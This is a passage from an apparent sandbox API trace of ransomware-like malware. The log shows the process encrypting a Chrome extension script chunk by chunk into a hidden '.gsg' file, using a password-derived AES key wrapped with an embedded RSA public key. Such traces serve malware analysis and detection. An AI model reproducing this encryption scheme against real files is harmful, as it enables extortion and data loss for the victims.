dwFlags=0x0) returned 1 [0261.195] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.195] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.195] GetLastError () returned 0x0 [0261.195] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js")) returned 0x20 [0261.195] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js", dwFileAttributes=0x80) returned 1 [0261.196] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.196] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.197] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.gsg", dwFileAttributes=0x2) returned 1 [0261.197] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.199] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.199] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.199] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.199] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.199] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.199] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.199] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e71150) returned 1 [0261.200] CryptImportPublicKeyInfo (in: hCryptProv=0x2e71150, dwCertEncodingType=0x1, pInfo=0x2eac4b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eac4e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eac4e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7d3c0) returned 1 [0261.200] CryptEncrypt (in: hKey=0x2e7d3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.200] CryptEncrypt (in: hKey=0x2e7d3c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e711d8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e711d8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.200] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e711d8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e711d8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.201] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.206] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.206] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.210] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.210] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.210] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.210] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.210] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.211] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.211] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.211] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.211] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.211] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.211] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.212] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.212] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.212] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.212] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.212] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.212] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.213] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.213] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.213] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.213] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.213] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.213] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.213] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.214] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.214] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.214] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.214] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.214] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.214] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.214] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.215] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.215] CryptEncrypt (in: hKey=0x2e7fd40, 